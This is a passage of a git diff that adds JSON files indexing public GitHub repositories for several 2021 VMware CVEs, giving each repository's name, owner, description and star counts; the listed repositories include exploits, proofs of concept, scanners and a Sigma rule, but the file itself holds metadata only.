+ "updated_at": "2024-03-30T18:24:18Z",
+ "pushed_at": "2021-04-02T00:32:15Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-21975",
+ "nmap",
+ "nmap-script"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 354134708,
+ "name": "CVE-2021-21975",
+ "full_name": "murataydemir\/CVE-2021-21975",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-21975",
+ "description": "[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)",
+ "fork": false,
+ "created_at": "2021-04-02T21:14:06Z",
+ "updated_at": "2023-09-28T11:26:24Z",
+ "pushed_at": "2021-04-02T23:06:48Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 355355329,
+ "name": "REALITY_SMASHER",
+ "full_name": "rabidwh0re\/REALITY_SMASHER",
+ "owner": {
+ "login": "rabidwh0re",
+ "id": 8302932,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8302932?v=4",
+ "html_url": "https:\/\/github.com\/rabidwh0re"
+ },
+ "html_url": "https:\/\/github.com\/rabidwh0re\/REALITY_SMASHER",
+ "description": "vRealize RCE + Privesc (CVE-2021-21975, CVE-2021-21983, CVE-0DAY-?????)",
+ "fork": false,
+ "created_at": "2021-04-06T23:24:38Z",
+ "updated_at": "2023-08-09T18:19:51Z",
+ "pushed_at": "2021-04-07T03:10:07Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 356577164,
+ "name": "VMWare-CVE-2021-21975",
+ "full_name": "Vulnmachines\/VMWare-CVE-2021-21975",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/VMWare-CVE-2021-21975",
+ "description": "VMWare-CVE-2021-21975 SSRF vulnerability",
+ "fork": false,
+ "created_at": "2021-04-10T12:36:07Z",
+ "updated_at": "2023-09-28T11:26:40Z",
+ "pushed_at": "2021-11-26T20:22:55Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21978.json b/2021/CVE-2021-21978.json
new file mode 100644
index 0000000000..14300315f2
--- /dev/null
+++ b/2021/CVE-2021-21978.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 344688633,
+ "name": "CVE-2021-21978",
+ "full_name": "GreyOrder\/CVE-2021-21978",
+ "owner": {
+ "login": "GreyOrder",
+ "id": 39576135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39576135?v=4",
+ "html_url": "https:\/\/github.com\/GreyOrder"
+ },
+ "html_url": "https:\/\/github.com\/GreyOrder\/CVE-2021-21978",
+ "description": "CVE-2021-21978 exp",
+ "fork": false,
+ "created_at": "2021-03-05T03:58:33Z",
+ "updated_at": "2023-12-04T18:12:04Z",
+ "pushed_at": "2021-03-05T04:22:26Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 344694759,
+ "name": "CVE-2021-21978",
+ "full_name": "me1ons\/CVE-2021-21978",
+ "owner": {
+ "login": "me1ons",
+ "id": 36701939,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36701939?v=4",
+ "html_url": "https:\/\/github.com\/me1ons"
+ },
+ "html_url": "https:\/\/github.com\/me1ons\/CVE-2021-21978",
+ "description": "CVE-2021-21978 EXP",
+ "fork": false,
+ "created_at": "2021-03-05T04:33:19Z",
+ "updated_at": "2023-09-28T11:25:30Z",
+ "pushed_at": "2021-03-05T04:42:17Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 344740961,
+ "name": "CVE-2021-21978",
+ "full_name": "skytina\/CVE-2021-21978",
+ "owner": {
+ "login": "skytina",
+ "id": 7366310,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7366310?v=4",
+ "html_url": "https:\/\/github.com\/skytina"
+ },
+ "html_url": "https:\/\/github.com\/skytina\/CVE-2021-21978",
+ "description": "带回显版本的漏洞利用脚本",
+ "fork": false,
+ "created_at": "2021-03-05T08:15:27Z",
+ "updated_at": "2024-03-25T17:10:50Z",
+ "pushed_at": "2021-03-05T11:09:06Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21980.json b/2021/CVE-2021-21980.json
new file mode 100644
index 0000000000..e777c1b7b6
--- /dev/null
+++ b/2021/CVE-2021-21980.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 434441728,
+ "name": "westone-CVE-2021-21980-scanner",
+ "full_name": "Osyanina\/westone-CVE-2021-21980-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-21980-scanner",
+ "description": "A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.",
+ "fork": false,
+ "created_at": "2021-12-03T02:30:14Z",
+ "updated_at": "2021-12-23T17:30:06Z",
+ "pushed_at": "2021-12-03T02:57:22Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 489669248,
+ "name": "westone-CVE-2022-1388-scanner",
+ "full_name": "Osyanina\/westone-CVE-2022-1388-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2022-1388-scanner",
+ "description": "A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.",
+ "fork": false,
+ "created_at": "2022-05-07T12:36:41Z",
+ "updated_at": "2022-05-07T12:37:01Z",
+ "pushed_at": "2022-05-07T12:41:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21983.json b/2021/CVE-2021-21983.json
new file mode 100644
index 0000000000..ad0af0b862
--- /dev/null
+++ b/2021/CVE-2021-21983.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 470562831,
+ "name": "CVE-2021-21983",
+ "full_name": "murataydemir\/CVE-2021-21983",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-21983",
+ "description": "[CVE-2021-21983] VMware vRealize Operations (vROps) Manager API Arbitrary File Write Leads to Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2022-03-16T11:56:25Z",
+ "updated_at": "2023-09-28T11:37:05Z",
+ "pushed_at": "2022-03-16T13:08:46Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21985.json b/2021/CVE-2021-21985.json
new file mode 100644
index 0000000000..ee2681d4ef
--- /dev/null
+++ b/2021/CVE-2021-21985.json
@@ -0,0 +1,313 @@
+[
+ {
+ "id": 371223609,
+ "name": "CVE-2021-21985",
+ "full_name": "bigbroke\/CVE-2021-21985",
+ "owner": {
+ "login": "bigbroke",
+ "id": 77472382,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77472382?v=4",
+ "html_url": "https:\/\/github.com\/bigbroke"
+ },
+ "html_url": "https:\/\/github.com\/bigbroke\/CVE-2021-21985",
+ "description": "Multiple vulnerabilities in the vSphere Client (HTML5) were privately reported to VMware. Updates and workarounds are available to address these vulnerabilities in affected VMware products.",
+ "fork": false,
+ "created_at": "2021-05-27T02:28:48Z",
+ "updated_at": "2021-05-27T14:19:48Z",
+ "pushed_at": "2021-05-27T02:30:02Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 371975592,
+ "name": "CVE-2021-21985_PoC",
+ "full_name": "alt3kx\/CVE-2021-21985_PoC",
+ "owner": {
+ "login": "alt3kx",
+ "id": 3140111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4",
+ "html_url": "https:\/\/github.com\/alt3kx"
+ },
+ "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-21985_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-29T13:07:14Z",
+ "updated_at": "2024-01-04T01:55:09Z",
+ "pushed_at": "2023-01-19T16:24:33Z",
+ "stargazers_count": 214,
+ "watchers_count": 214,
+ "has_discussions": false,
+ "forks_count": 52,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 52,
+ "watchers": 214,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 372757311,
+ "name": "CVE-2021-21985-Checker",
+ "full_name": "onSec-fr\/CVE-2021-21985-Checker",
+ "owner": {
+ "login": "onSec-fr",
+ "id": 59887731,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59887731?v=4",
+ "html_url": "https:\/\/github.com\/onSec-fr"
+ },
+ "html_url": "https:\/\/github.com\/onSec-fr\/CVE-2021-21985-Checker",
+ "description": "CVE-2021-21985 Checker.",
+ "fork": false,
+ "created_at": "2021-06-01T08:31:05Z",
+ "updated_at": "2023-05-05T16:11:50Z",
+ "pushed_at": "2021-06-01T08:32:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 372936761,
+ "name": "CVE-2021-21985",
+ "full_name": "mauricelambert\/CVE-2021-21985",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-21985",
+ "description": "This script check the CVE-2021-21985 vulnerability and patch on vCenter Server.",
+ "fork": false,
+ "created_at": "2021-06-01T19:12:29Z",
+ "updated_at": "2021-06-01T19:16:35Z",
+ "pushed_at": "2021-06-01T19:13:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-21985",
+ "python3",
+ "security",
+ "security-scan",
+ "vcenter"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 373496154,
+ "name": "cve-2021-21985_exp",
+ "full_name": "xnianq\/cve-2021-21985_exp",
+ "owner": {
+ "login": "xnianq",
+ "id": 17513849,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17513849?v=4",
+ "html_url": "https:\/\/github.com\/xnianq"
+ },
+ "html_url": "https:\/\/github.com\/xnianq\/cve-2021-21985_exp",
+ "description": "cve-2021-21985 exploit",
+ "fork": false,
+ "created_at": "2021-06-03T12:17:06Z",
+ "updated_at": "2024-05-10T10:42:00Z",
+ "pushed_at": "2022-01-10T07:01:58Z",
+ "stargazers_count": 113,
+ "watchers_count": 113,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 113,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 373684696,
+ "name": "CVE-2021-21985",
+ "full_name": "daedalus\/CVE-2021-21985",
+ "owner": {
+ "login": "daedalus",
+ "id": 115175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115175?v=4",
+ "html_url": "https:\/\/github.com\/daedalus"
+ },
+ "html_url": "https:\/\/github.com\/daedalus\/CVE-2021-21985",
+ "description": "CVE-2021-21985 vmware 6.7-9.8 RCE",
+ "fork": false,
+ "created_at": "2021-06-04T01:15:14Z",
+ "updated_at": "2023-09-28T11:28:20Z",
+ "pushed_at": "2023-11-27T18:36:50Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-21985",
+ "rce",
+ "vmware"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 374091686,
+ "name": "Project_CVE-2021-21985_PoC",
+ "full_name": "testanull\/Project_CVE-2021-21985_PoC",
+ "owner": {
+ "login": "testanull",
+ "id": 21060210,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21060210?v=4",
+ "html_url": "https:\/\/github.com\/testanull"
+ },
+ "html_url": "https:\/\/github.com\/testanull\/Project_CVE-2021-21985_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-05T11:03:13Z",
+ "updated_at": "2024-03-27T07:18:43Z",
+ "pushed_at": "2021-06-07T04:00:06Z",
+ "stargazers_count": 33,
+ "watchers_count": 33,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 33,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 384003238,
+ "name": "CVE-2021-21985",
+ "full_name": "haidv35\/CVE-2021-21985",
+ "owner": {
+ "login": "haidv35",
+ "id": 20736458,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20736458?v=4",
+ "html_url": "https:\/\/github.com\/haidv35"
+ },
+ "html_url": "https:\/\/github.com\/haidv35\/CVE-2021-21985",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-08T04:45:19Z",
+ "updated_at": "2023-03-08T02:48:17Z",
+ "pushed_at": "2021-07-12T11:04:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 385047792,
+ "name": "CVE-2021-21985",
+ "full_name": "aristosMiliaressis\/CVE-2021-21985",
+ "owner": {
+ "login": "aristosMiliaressis",
+ "id": 11355060,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11355060?v=4",
+ "html_url": "https:\/\/github.com\/aristosMiliaressis"
+ },
+ "html_url": "https:\/\/github.com\/aristosMiliaressis\/CVE-2021-21985",
+ "description": "cve-2021-21985 powershell poc",
+ "fork": false,
+ "created_at": "2021-07-11T20:38:19Z",
+ "updated_at": "2024-06-21T00:09:25Z",
+ "pushed_at": "2021-07-11T20:39:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 426353517,
+ "name": "CVE-2021-21985_PoC",
+ "full_name": "sknux\/CVE-2021-21985_PoC",
+ "owner": {
+ "login": "sknux",
+ "id": 45546882,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45546882?v=4",
+ "html_url": "https:\/\/github.com\/sknux"
+ },
+ "html_url": "https:\/\/github.com\/sknux\/CVE-2021-21985_PoC",
+ "description": "VMWARE VCENTER SERVER VIRTUAL SAN HEALTH CHECK PLUG-IN RCE (CVE-2021-21985) ",
+ "fork": false,
+ "created_at": "2021-11-09T19:06:29Z",
+ "updated_at": "2022-01-18T15:09:25Z",
+ "pushed_at": "2021-11-09T19:14:55Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22.json b/2021/CVE-2021-22.json
new file mode 100644
index 0000000000..63d0a5068b
--- /dev/null
+++ b/2021/CVE-2021-22.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 615475256,
+ "name": "CVE-2021-22-555",
+ "full_name": "LingerANR\/CVE-2021-22-555",
+ "owner": {
+ "login": "LingerANR",
+ "id": 31801397,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31801397?v=4",
+ "html_url": "https:\/\/github.com\/LingerANR"
+ },
+ "html_url": "https:\/\/github.com\/LingerANR\/CVE-2021-22-555",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-17T19:32:45Z",
+ "updated_at": "2023-03-17T19:38:26Z",
+ "pushed_at": "2023-03-17T19:38:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22005.json b/2021/CVE-2021-22005.json
new file mode 100644
index 0000000000..986897dc72
--- /dev/null
+++ b/2021/CVE-2021-22005.json
@@ -0,0 +1,362 @@
+[
+ {
+ "id": 409392445,
+ "name": "CVE-2021-22005",
+ "full_name": "1ZRR4H\/CVE-2021-22005",
+ "owner": {
+ "login": "1ZRR4H",
+ "id": 42696639,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42696639?v=4",
+ "html_url": "https:\/\/github.com\/1ZRR4H"
+ },
+ "html_url": "https:\/\/github.com\/1ZRR4H\/CVE-2021-22005",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-23T00:09:03Z",
+ "updated_at": "2023-12-29T05:43:57Z",
+ "pushed_at": "2021-09-23T00:10:18Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 409444571,
+ "name": "Sigma-Rule-for-CVE-2021-22005-scanning-activity",
+ "full_name": "pisut4152\/Sigma-Rule-for-CVE-2021-22005-scanning-activity",
+ "owner": {
+ "login": "pisut4152",
+ "id": 72641661,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72641661?v=4",
+ "html_url": "https:\/\/github.com\/pisut4152"
+ },
+ "html_url": "https:\/\/github.com\/pisut4152\/Sigma-Rule-for-CVE-2021-22005-scanning-activity",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-23T04:14:05Z",
+ "updated_at": "2023-09-28T11:31:40Z",
+ "pushed_at": "2021-09-23T04:21:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 409794887,
+ "name": "VMWare-CVE-Check",
+ "full_name": "Jeromeyoung\/VMWare-CVE-Check",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/VMWare-CVE-Check",
+ "description": "CVE-2021-22005",
+ "fork": false,
+ "created_at": "2021-09-24T01:31:29Z",
+ "updated_at": "2021-09-24T01:31:30Z",
+ "pushed_at": "2021-09-23T20:01:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410204640,
+ "name": "CVE-2021-22005-",
+ "full_name": "5gstudent\/CVE-2021-22005-",
+ "owner": {
+ "login": "5gstudent",
+ "id": 37172754,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37172754?v=4",
+ "html_url": "https:\/\/github.com\/5gstudent"
+ },
+ "html_url": "https:\/\/github.com\/5gstudent\/CVE-2021-22005-",
+ "description": "CVE-2021-22005批量验证python脚本",
+ "fork": false,
+ "created_at": "2021-09-25T07:19:42Z",
+ "updated_at": "2024-02-20T07:02:39Z",
+ "pushed_at": "2021-09-25T07:58:15Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410727345,
+ "name": "CVE-2021-22005_PoC",
+ "full_name": "RedTeamExp\/CVE-2021-22005_PoC",
+ "owner": {
+ "login": "RedTeamExp",
+ "id": 74718678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74718678?v=4",
+ "html_url": "https:\/\/github.com\/RedTeamExp"
+ },
+ "html_url": "https:\/\/github.com\/RedTeamExp\/CVE-2021-22005_PoC",
+ "description": "CVE-2021-22005_PoC",
+ "fork": false,
+ "created_at": "2021-09-27T03:18:09Z",
+ "updated_at": "2021-12-18T07:16:48Z",
+ "pushed_at": "2021-09-27T03:18:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 411438681,
+ "name": "CVE-2021-22005",
+ "full_name": "rwincey\/CVE-2021-22005",
+ "owner": {
+ "login": "rwincey",
+ "id": 5438659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4",
+ "html_url": "https:\/\/github.com\/rwincey"
+ },
+ "html_url": "https:\/\/github.com\/rwincey\/CVE-2021-22005",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-28T21:06:59Z",
+ "updated_at": "2024-04-08T06:46:45Z",
+ "pushed_at": "2021-09-28T21:08:21Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 412724557,
+ "name": "CVE-2021-22005-metasploit",
+ "full_name": "TaroballzChen\/CVE-2021-22005-metasploit",
+ "owner": {
+ "login": "TaroballzChen",
+ "id": 27862593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4",
+ "html_url": "https:\/\/github.com\/TaroballzChen"
+ },
+ "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-22005-metasploit",
+ "description": "the metasploit script(POC\/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability",
+ "fork": false,
+ "created_at": "2021-10-02T07:32:04Z",
+ "updated_at": "2024-04-24T17:28:29Z",
+ "pushed_at": "2021-10-02T08:21:38Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 420817779,
+ "name": "CVE-2021-22005",
+ "full_name": "tiagob0b\/CVE-2021-22005",
+ "owner": {
+ "login": "tiagob0b",
+ "id": 24528913,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24528913?v=4",
+ "html_url": "https:\/\/github.com\/tiagob0b"
+ },
+ "html_url": "https:\/\/github.com\/tiagob0b\/CVE-2021-22005",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-24T23:14:01Z",
+ "updated_at": "2022-11-09T18:14:11Z",
+ "pushed_at": "2021-10-24T23:14:11Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421739207,
+ "name": "CVE-2021-22005",
+ "full_name": "Jun-5heng\/CVE-2021-22005",
+ "owner": {
+ "login": "Jun-5heng",
+ "id": 88525975,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4",
+ "html_url": "https:\/\/github.com\/Jun-5heng"
+ },
+ "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-22005",
+ "description": "VMware vCenter Server任意文件上传漏洞 \/ Code By:Jun_sheng",
+ "fork": false,
+ "created_at": "2021-10-27T08:36:21Z",
+ "updated_at": "2024-05-09T12:38:15Z",
+ "pushed_at": "2022-07-08T09:17:14Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439563239,
+ "name": "cve-2021-22005-exp",
+ "full_name": "shmilylty\/cve-2021-22005-exp",
+ "owner": {
+ "login": "shmilylty",
+ "id": 24275308,
